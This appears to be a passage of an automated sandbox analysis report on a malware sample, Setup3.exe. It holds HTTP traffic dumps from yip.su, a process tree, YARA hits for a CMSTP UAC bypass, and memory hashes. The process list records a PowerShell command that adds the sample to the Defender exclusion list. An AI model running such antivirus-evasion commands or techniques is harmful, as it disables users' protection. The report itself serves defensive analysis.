                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:12:03 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:12:03 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 34 32 35 37 32 27 2c 63 52 61 79 3a 20 27 38 62 34 64 30 30 65 33 38 38 65 30 31 38 62 63 27 2c 63 48 61 73 68 3a 20 27 36 64 38 36 36 32 33 31 31 38 36 32 64 38 36 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 74 44 61 53 75 4c 69 53 53 57 35 4d 4c 74 53 55 48 53 76 53 31 69 6b 62 34 38 56 34 2e 46 51 47 36 6e 42 73 31 33 5f 47 33 33 6b 2d 31 37 32 33 39 33 32 37 32 33 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '42572',cRay: '8b4d00e388e018bc',cHash: '6d8662311862d86',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=tDaSuLiSSW5MLtSUHSvS1ikb48V4.FQG6nBs13_G33k-1723932723-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:12:03 UTC1369INData Raw: 4e 38 44 65 62 48 52 41 44 6b 69 5f 6a 49 4f 56 53 57 54 78 41 37 69 56 4c 61 68 51 6f 6c 68 45 30 42 63 54 2e 6f 37 2e 63 4f 6e 53 56 4b 48 50 6c 70 4d 54 6d 53 75 35 50 6c 64 79 5a 4e 49 61 34 5a 46 36 59 33 6d 31 64 51 65 4e 57 4b 48 35 59 35 6f 69 52 38 49 51 70 68 50 5f 47 7a 44 50 67 37 34 31 62 73 51 42 6b 2e 64 7a 33 54 62 55 4b 46 4d 37 62 4b 61 36 38 31 4d 4b 4e 31 5f 45 2e 45 65 2e 58 32 38 52 30 68 74 79 45 4b 4c 75 55 57 74 43 43 34 54 33 79 6c 6b 71 76 2e 4e 30 62 61 5f 30 55 6b 47 72 45 6f 51 70 57 6b 57 4a 45 57 5f 42 5a 73 7a 58 4f 42 47 4d 75 4d 37 69 78 42 45 69 7a 56 30 6e 6a 63 55 68 35 31 47 58 6f 79 71 31 36 67 4d 58 4d 7a 35 71 4a 39 38 42 6e 41 4c 58 4e 4f 48 2e 47 69 71 43 67 30 6f 70 32 67 6d 35 77 39 6b 5f 65 77 30 58 54 69 76
                                    Data Ascii: N8DebHRADki_jIOVSWTxA7iVLahQolhE0BcT.o7.cOnSVKHPlpMTmSu5PldyZNIa4ZF6Y3m1dQeNWKH5Y5oiR8IQphP_GzDPg741bsQBk.dz3TbUKFM7bKa681MKN1_E.Ee.X28R0htyEKLuUWtCC4T3ylkqv.N0ba_0UkGrEoQpWkWJEW_BZszXOBGMuM7ixBEizV0njcUh51GXoyq16gMXMz5qJ98BnALXNOH.GiqCg0op2gm5w9k_ew0XTiv


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:18:07:58
                                    Start date:17/08/2024
                                    Path:C:\Users\user\Desktop\Setup3.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\Setup3.exe"
                                    Imagebase:0x1aad2d60000
                                    File size:1'118'952 bytes
                                    MD5 hash:CC5BE4E36EEC1B0C1248D6FA623C1D74
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2234066396.000001AAD51D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:1
                                    Start time:18:07:58
                                    Start date:17/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:18:08:01
                                    Start date:17/08/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -Force
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:18:08:01
                                    Start date:17/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:18:08:01
                                    Start date:17/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                    Wow64 process (32bit):
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                    Imagebase:
                                    File size:42'064 bytes
                                    MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:6
                                    Start time:18:08:01
                                    Start date:17/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                    Imagebase:
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:7
                                    Start time:18:08:02
                                    Start date:17/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    Wow64 process (32bit):
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                    Imagebase:
                                    File size:65'440 bytes
                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:8
                                    Start time:18:08:02
                                    Start date:17/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                    Imagebase:0x4a0000
                                    File size:47'584 bytes
                                    MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:9
                                    Start time:18:08:02
                                    Start date:17/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    Wow64 process (32bit):
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                    Imagebase:
                                    File size:47'584 bytes
                                    MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:12
                                    Start time:18:08:03
                                    Start date:17/08/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 2792 -s 1104
                                    Imagebase:0x7ff6a1840000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:14
                                    Start time:18:08:05
                                    Start date:17/08/2024
                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Imagebase:0x7ff6ef0c0000
                                    File size:496'640 bytes
                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                    Has elevated privileges:true
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:11%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:21.7%
                                      Total number of Nodes:23
                                      Total number of Limit Nodes:3
                                      execution_graph 14413 7ff848f24cea 14414 7ff848f24cf9 VirtualProtect 14413->14414 14416 7ff848f24dd1 14414->14416 14390 7ff848f20a05 14391 7ff848f20a2f 14390->14391 14398 7ff848f206b0 14391->14398 14393 7ff848f20adf 14403 7ff848f206b8 14393->14403 14395 7ff848f20b86 14408 7ff848f20750 14395->14408 14397 7ff848f20bb2 14399 7ff848f206b5 14398->14399 14400 7ff848f20780 14399->14400 14401 7ff848f2090a FreeConsole 14399->14401 14400->14393 14402 7ff848f2093e 14401->14402 14402->14393 14405 7ff848f206bd 14403->14405 14404 7ff848f20780 14404->14395 14405->14404 14406 7ff848f2090a FreeConsole 14405->14406 14407 7ff848f2093e 14406->14407 14407->14395 14409 7ff848f20759 14408->14409 14410 7ff848f207fb 14409->14410 14411 7ff848f2090a FreeConsole 14409->14411 14410->14397 14412 7ff848f2093e 14411->14412 14412->14397

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2237843560.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff848f20000_Setup3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0dH$fish
                                      • API String ID: 0-4183842881
                                      • Opcode ID: 73d2da2cad73885ce297fcc849a5d4de5309abec8bfd1865a963d03776c55350
                                      • Instruction ID: 390611a9bab21c282fc9247aba5eae5af85f43d644c3f08acc35636ab6d48ae9
                                      • Opcode Fuzzy Hash: 73d2da2cad73885ce297fcc849a5d4de5309abec8bfd1865a963d03776c55350
                                      • Instruction Fuzzy Hash: D8A1E731A1DA4D5FE758FB28A4655BA73E0FF99350F00067EE44BC32D2DE29B8428785
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2237843560.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff848f20000_Setup3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8bf6a6a691503a659e7b149af9e088a95b143f90108e55c6d573980f50ce510b
                                      • Instruction ID: c54d0feef5469459b4a15277b99ec16f654868d45a03456bb0b6632cc4e4dd67
                                      • Opcode Fuzzy Hash: 8bf6a6a691503a659e7b149af9e088a95b143f90108e55c6d573980f50ce510b
                                      • Instruction Fuzzy Hash: C9F2123061CB494FE359EB2894904B5B7E2FFC5341F1446BEE48AC72A6DE39E846C781
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2237843560.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff848f20000_Setup3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f482ff466fab86d06541536da27fd903aeb58fb4e34052bea4819dd52eba646d
                                      • Instruction ID: 2a2f8266a1038dcb505bcdc43a2a99a23dcde14b382053ccf67405e40b31de3e
                                      • Opcode Fuzzy Hash: f482ff466fab86d06541536da27fd903aeb58fb4e34052bea4819dd52eba646d
                                      • Instruction Fuzzy Hash: 43320530A0CA498FEB68EB28E45567977E1FF55340F2401BEE48EC72D2DF25AC428B45
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2237843560.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff848f20000_Setup3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 45948d16aba1084657be97a03bc52f5b92670cc170b095b61b6abdbfaf8eda3a
                                      • Instruction ID: 8fdf334c4ed3be4fd8df7d7c4e6d82ec4cf9b6bfad79df2fb6dd465674561a07
                                      • Opcode Fuzzy Hash: 45948d16aba1084657be97a03bc52f5b92670cc170b095b61b6abdbfaf8eda3a
                                      • Instruction Fuzzy Hash: A6F1693190DB8A4FE31DEB2894911B5B7E2FF91301F1446BED4CAC72D5DE2AA402C785
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2237843560.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff848f20000_Setup3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a9ecf7ca3ece80358361e6ac479d968981aa8cbee7cfbd52c237b6f940bf2e8a
                                      • Instruction ID: 5be4c1ddfe52eaa0cb2439a1521c77a9a2cdf859e58f9366c7e5fa037d08c9bd
                                      • Opcode Fuzzy Hash: a9ecf7ca3ece80358361e6ac479d968981aa8cbee7cfbd52c237b6f940bf2e8a
                                      • Instruction Fuzzy Hash: 8C81C122B1DE495FE789F77C54263B96AD2EFCA290F5500BAD40EC32D3EE1D58028746
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2237843560.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff848f20000_Setup3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 90f1b89f000c074424a287c5d6c9805967880589c6c1eb8e103132352cfe28c8
                                      • Instruction ID: 04853c1365b47c328be77fad8bdb770a4337a7490eeab4ff0a72d7a5e0796b22
                                      • Opcode Fuzzy Hash: 90f1b89f000c074424a287c5d6c9805967880589c6c1eb8e103132352cfe28c8
                                      • Instruction Fuzzy Hash: E941383160D6890FD71E9B3888251B57FA5EB43220B1582BFD4C7C71E7DD18680683A5

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2237843560.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff848f20000_Setup3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: N_^$N_^
                                      • API String ID: 0-386383641
                                      • Opcode ID: 915bdd22ce4571acf69502d82c63cf46d12821669b65c5a8c63c2ebc99b43f55
                                      • Instruction ID: cd3f4f283ac828c9763877253524e36e685dd11b3ed68d823c27fcbf720c9f61
                                      • Opcode Fuzzy Hash: 915bdd22ce4571acf69502d82c63cf46d12821669b65c5a8c63c2ebc99b43f55
                                      • Instruction Fuzzy Hash: 3891B273D0E6D58FE356BB78686A1E97FE0FFA2250F0801BBC8888B1D3DA195805C755

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 858 7ff848f24cea-7ff848f24cf7 859 7ff848f24cf9-7ff848f24d01 858->859 860 7ff848f24d02-7ff848f24dcf VirtualProtect 858->860 859->860 864 7ff848f24dd1 860->864 865 7ff848f24dd7-7ff848f24dff 860->865 864->865
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2237843560.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff848f20000_Setup3.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 64b7d3a3ddf00b261b57b09287613c981e6f0ff4bf808893cc69ab6109261d54
                                      • Instruction ID: 02d6e7abfd283e7932186b696eb13355e692c450f24b19e92bb669ec14caa386
                                      • Opcode Fuzzy Hash: 64b7d3a3ddf00b261b57b09287613c981e6f0ff4bf808893cc69ab6109261d54
                                      • Instruction Fuzzy Hash: EB412A3090DB884FD71ADB6898466F97FF1EF56321F0402AFD049C31A3CB686856C796

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 866 7ff848f208a5-7ff848f20902 869 7ff848f2090a-7ff848f2093c FreeConsole 866->869 870 7ff848f2093e 869->870 871 7ff848f20944-7ff848f20960 869->871 870->871
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2237843560.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff848f20000_Setup3.jbxd
                                      Similarity
                                      • API ID: ConsoleFree
                                      • String ID:
                                      • API String ID: 771614528-0
                                      • Opcode ID: 9685fb3096ae1450e841ffedaaee57a6655152bc6481ebaf8cdc493687013e5a
                                      • Instruction ID: 312896afd6ae1e589e335b9bec52f08cf890438bcc700fc6373d9181329b42e9
                                      • Opcode Fuzzy Hash: 9685fb3096ae1450e841ffedaaee57a6655152bc6481ebaf8cdc493687013e5a
                                      • Instruction Fuzzy Hash: 2921B57190CB4C8FDB19EB58D8496E9BBF0FB55310F00416FD08AC3552DB75684ACB51

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 987 7ff8490101b8-7ff8490101ec 990 7ff8490101ee-7ff849010222 987->990 991 7ff849010236-7ff84901023b 987->991 992 7ff849010228-7ff849010231 990->992 993 7ff8490103b1-7ff8490103b7 990->993 991->993 994 7ff84901023c-7ff84901024e 991->994 995 7ff849010233-7ff849010235 992->995 1002 7ff8490103b9-7ff8490103c8 993->1002 996 7ff84901024f-7ff849010255 994->996 995->991 997 7ff84901029f-7ff8490102a0 996->997 998 7ff849010257-7ff84901026d 996->998 997->995 1000 7ff8490102a2-7ff8490102b8 997->1000 998->993 1005 7ff849010273-7ff84901027c 998->1005 1000->993 1004 7ff8490102be-7ff8490102d1 1000->1004 1003 7ff8490103c9-7ff8490103e3 1002->1003 1006 7ff8490102d4 1004->1006 1007 7ff849010284-7ff849010286 1005->1007 1006->993 1008 7ff8490102da-7ff8490102f5 1006->1008 1009 7ff849010288-7ff849010289 1007->1009 1010 7ff8490102f7-7ff849010306 1007->1010 1008->1010 1009->996 1012 7ff84901028b 1009->1012 1013 7ff849010307-7ff849010309 1010->1013 1012->1013 1014 7ff84901028d 1012->1014 1013->993 1015 7ff84901030a-7ff849010348 1013->1015 1014->1006 1016 7ff84901028f-7ff84901029d 1014->1016 1015->1002 1021 7ff84901034a-7ff84901034d 1015->1021 1016->997 1021->1003 1022 7ff84901034f 1021->1022 1023 7ff849010351-7ff84901035f 1022->1023 1024 7ff849010396-7ff84901039a 1022->1024 1023->1024 1026 7ff8490103a5-7ff8490103b0 1024->1026
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2238227163.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff849010000_Setup3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: A
                                      • API String ID: 0-3554254475
                                      • Opcode ID: e1277c1c114b2a2f8dab68cd797b03aa3d18873e4753682ddba04c251b8f7e82
                                      • Instruction ID: e9fcf50326c3f4eaf4dacce71c545c05be9f6aacff5ba151e7053ba79eb76a2d
                                      • Opcode Fuzzy Hash: e1277c1c114b2a2f8dab68cd797b03aa3d18873e4753682ddba04c251b8f7e82
                                      • Instruction Fuzzy Hash: D081083180CAC9CFDF69EF28C856AE87BF0FF55344F1441ADD08AD7192DA6AA846C740
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2238227163.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff849010000_Setup3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9af9af15a9e2d0b11b278a9c9ab28786f51e49450c16bc1cc9dfcaf65df5b7d2
                                      • Instruction ID: 9eb4954eabaf6c2b144a3ce00fbbd07699eb31ac983b9d25350566a5fca8eb35
                                      • Opcode Fuzzy Hash: 9af9af15a9e2d0b11b278a9c9ab28786f51e49450c16bc1cc9dfcaf65df5b7d2
                                      • Instruction Fuzzy Hash: 72721B3180DBC5CFEB6AEB2898565A47FF0FF56340B1805FEC489CB193E919A84AC751
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2238227163.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff849010000_Setup3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f13c51398dc5ad717dfabaa4dbd8ede11da8237b95bd9fe8217769d77415f33d
                                      • Instruction ID: 553cab925620c6bb53b14f396937a4813879647f54a2f7136c83e34e36720f13
                                      • Opcode Fuzzy Hash: f13c51398dc5ad717dfabaa4dbd8ede11da8237b95bd9fe8217769d77415f33d
                                      • Instruction Fuzzy Hash: 8371D63190DAC98FEBAAEF3898569B57BE0EF56344B1501FAD04AC7193EE19E805C341
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2238227163.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff849010000_Setup3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c6100612b91090557b2d9e99e806569862aef7f85576314aff33813379c6fa20
                                      • Instruction ID: a61dc7476cb7e1e2842fae7da8970fb2b7cadade2f86c7832a32f2b76d20a5b0
                                      • Opcode Fuzzy Hash: c6100612b91090557b2d9e99e806569862aef7f85576314aff33813379c6fa20
                                      • Instruction Fuzzy Hash: 3741263190CA898FDFA9EF28D8568A87BE0FF55344B1401BAD04AC7597EE26E801C380
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2238227163.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff849010000_Setup3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a0be1e6edb1667110fb51fee3e79309d061c6e64d0d6efb8ffc85d05e872405c
                                      • Instruction ID: d816a780dd5b3cc23d54f497012e461918d572fea3acd97809e997171718c703
                                      • Opcode Fuzzy Hash: a0be1e6edb1667110fb51fee3e79309d061c6e64d0d6efb8ffc85d05e872405c
                                      • Instruction Fuzzy Hash: 0EF09A32E186588FDF50EE9CA8429ECB7F0FB94740F00007AD449EB241EE30A8468B41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2237843560.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff848f20000_Setup3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "C2$2N_^
                                      • API String ID: 0-813101106
                                      • Opcode ID: e9a5c5e11a8d3c1e971678ad7b1391f49004eeb18ee6dc2093604d7ce16d6ee7
                                      • Instruction ID: 9ed4da479cd959a5ce3bc111483b9649be339bdaf973ebaad3e57fde1624f5db
                                      • Opcode Fuzzy Hash: e9a5c5e11a8d3c1e971678ad7b1391f49004eeb18ee6dc2093604d7ce16d6ee7
                                      • Instruction Fuzzy Hash: 57310727B1D9369A87113ABD78451E6FB50EF813BAB08467BD2C8CD443960C748687E8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4477572378.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_2730000_jsc.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ppd
                                      • API String ID: 0-4245885780
                                      • Opcode ID: c44130bc892109ee255939e60c4bb70dc62b222ad0e201425474a548aea1f5cb
                                      • Instruction ID: ce606c630a8126467c844a48092023de597340b30bacfddcb63c5f9212d71acb
                                      • Opcode Fuzzy Hash: c44130bc892109ee255939e60c4bb70dc62b222ad0e201425474a548aea1f5cb
                                      • Instruction Fuzzy Hash: 7221286160D3A54FDB07DB3884653AD3F726F8B614F2905DAC081EF2B7CA144D09D7A6
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4477572378.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_2730000_jsc.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 91ccc893284717a7a64dfa4de697444266dfcc1a0334bd22f5c5defb9c1bb5c9
                                      • Instruction ID: 45a04ac22c4119775cce7370bb553fa48e7c5d4805dda4d9729d7a4490161b8f
                                      • Opcode Fuzzy Hash: 91ccc893284717a7a64dfa4de697444266dfcc1a0334bd22f5c5defb9c1bb5c9
                                      • Instruction Fuzzy Hash: E2414075A002098FCB15EB68C558BADBBF2AF88314F288569D409AB352CB75DD42CF91
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4477572378.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_2730000_jsc.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a26047f44b037d6b5fae9729e081fde3b0ae504e89efa843c8f9b432a9d1b377
                                      • Instruction ID: 33b358938bf3168a8960b0d6f4cfe2000a4c599a9c80b332ebc8a6ad0a865163
